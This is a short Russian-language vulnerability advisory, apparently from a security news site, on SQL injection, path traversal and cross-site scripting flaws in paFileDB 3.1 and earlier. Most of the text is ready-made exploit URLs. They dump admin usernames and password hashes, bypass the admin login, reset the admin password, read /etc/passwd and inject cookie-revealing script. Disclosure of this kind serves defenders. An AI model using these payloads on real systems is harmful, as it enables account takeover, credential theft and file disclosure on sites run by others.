Программа: paFileDB 3.1 и более ранние версии 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды в базе данных приложения, просмотреть и выполнить произвольные файлы на системе.

1. SQL-инъекция возможна из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения.

Примеры:

http://[target]/pafiledb.php?action=admin&login=do& formname=’%20UNION%20SELECT%20admin_id,
%20admin_username,%20’6f1ed002ab5595859014eb f0951522d9′,%20admin_email,%20’1’%20FROM%20
pafiledb_admin%20WHERE%20’1&formpass=blah& B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do 

http://[target]/pafiledb.php?select=-99’%20UNION
%20SELECT%200,admin_username,admin_password,
0,0,0,0%20FROM%20pafiledb_admin%20WHERE% 201/*&B1=%3E%3E+Edit+Category+%3C%3C&action
=team&tm=category&category=edit&edit=form&menu1
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam% 26tm%3Dcategory%26category%3Dedit

http://[target]/pafiledb.php?id=-99’%20UNION%20
SELECT%200,admin_username,admin_password,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_ admin%20WHERE%201/*&B1=%3E%3E+Edit+
File+%3C%3C&action=team&tm=file&file=edit& edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3F
action%3Dteam%26tm%3Dfile%26file%3Dedit

http://[target]/pafiledb.php?action=team&tm=file& file=edit&id=1&edit=do&query=UPDATE%20
pafiledb_admin%20SET%20admin_password%20 =%20MD5%281337%28%20WHERE%201/* 

2. Уязвимость при обработке входных данных в параметре action сценария ‘pafiledb.php’ позволяет удаленному пользователю просмотреть и выполнить произвольные файлы на целевой системе. 

Пример:

http://[target]/pafiledb.php?action=../../../../ etc/passwd%00&login=do 

3. Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры:

http://[target]/pafiledb.php?action=viewall&start=20& sortby=name%22%3E%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E 

http://[target]/pafiledb.php?action=category&id=1 &filelist=%22%3E%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1 &pages=%22%3E%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E



Оставить мнение